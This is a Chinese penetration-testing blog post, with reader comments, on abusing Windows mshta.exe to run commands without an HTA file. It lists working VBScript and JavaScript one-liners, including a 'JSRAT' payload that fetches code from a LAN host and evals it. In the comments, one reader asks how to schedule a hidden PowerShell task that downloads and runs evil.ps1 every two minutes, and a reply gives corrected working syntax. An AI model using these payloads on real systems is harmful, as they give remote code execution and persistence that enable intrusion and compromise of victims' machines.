Exec Commands Via Mshta.exe
in 渗透案例奇技淫巧 with 2 comments

Exec Commands Via Mshta.exe

in 渗透案例奇技淫巧 with 2 comments

用“世界上最好的编程语言”制作的敲诈者木马揭秘的时候发现,攻击者使用mshta来执行命令,之前没怎么接触过,查了查资料也不是很多,mshta是用来执行hta文件的,经过测试发现,其实没有hta文件,也可以通过mshta来执行命令的,经过几次测试发现mshta不仅可以使用vbscript,而且可以使用javascript来执行命令,整理payload如下:

VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

JSRAT

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Demo如下:
请输入图片描述

你猜猜还可以怎么玩儿? 2333333.

Responses
  1. stonedeyy

    你好,请教个问题,我用schtasks /create /tn mytask /tr "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.1/evil.ps1')" /sc MINUTE /mo 2添加计划任务时,在计划任务管理器中,'http://192.168.137.1/evil.ps1'变成了"http://192.168.137.1/evil.ps1",单引号变成了双引号,这样脚本就无法下载了,不知如何解决,使单引号保持不变,望赐教谢谢

    Reply
    1. @stonedeyy

      你命令错了吧 你试试这个:schtasks /create /tn mytask /tr "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.1/evil.ps1');\"" /sc MINUTE /mo 2

      Reply